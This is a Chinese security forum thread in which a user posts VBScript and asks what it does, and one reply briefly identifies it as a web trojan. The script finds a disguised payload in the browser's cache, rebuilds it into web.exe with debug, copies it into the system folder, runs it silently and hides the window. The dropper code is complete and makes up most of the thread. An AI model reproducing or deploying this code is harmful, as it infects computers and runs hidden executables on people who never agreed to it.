|
 | 作者: cg2327 [cg2327]
 |
登录 |
<SCRIPT LANGUAGE="VBScript"> Option Explicit Dim FSO,WSH,CACHE,str,sucess Set FSO = CreateObject("Scripting.FileSystemObject") Set WSH = CreateObject("WScript.Shell") CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache") sucess=0 SearchBMPFile fso.GetFolder(CACHE),"web[1].bmp" if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"web[2].bmp" Function SearchBMPFile(Folder,fname) Dim SubFolder,File,Lt,tmp,winsys str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname'); if FSO.FileExists(str) then tmp=fso.GetSpecialFolder(2) & "\" winsys=fso.GetSpecialFolder(1) & "\" set File=FSO.GetFile(str) File.Copy(tmp & "tmp.dat") On Error Resume Next File.Delete if FSO.FileExists(str) then exit function set Lt=FSO.CreateTextFile(tmp & "tmp.in") Lt.WriteLine("rbx") Lt.WriteLine("0") Lt.WriteLine("rcx") Lt.WriteLine("29D9") Lt.WriteLine("w136") Lt.WriteLine("q") Lt.Close set Lt=FSO.CreateTextFile(tmp & "tmp.bat") Lt.WriteLine("@echo off") Lt.WriteLine("debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out") Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "web.exe>" & tmp & "tmp.out") Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out") Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out") Lt.WriteLine(winsys & "web.exe") Lt.Close WSH.Run tmp & "tmp.bat",false,6 On Error Resume Next 'FSO.GetFile(tmp & "tmp.bat").Delete sucess=1 end if If Folder.SubFolders.Count <> 0 Then For Each SubFolder In Folder.SubFolders SearchBMPFile SubFolder,fname Next End If End Function window.close </script> <SCRIPT language=JavaScript> parent.moveTo(0,0); parent.resizeTo(0,0); </SCRIPT> |
| 地主 发表时间: 04-07-03 01:05 |
 | 回复: Frankiez [frankiez84]  论坛用户 |
登录 |
|
没细看,不过看到几个细节初步定为网页木马,用debug将下到网页临时文件夹的图片文件中的木马体释放出来 |
| B1层 发表时间: 04-07-03 08:00 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 编程破解
标题: 有没有人帮我详细的解释一下这些代码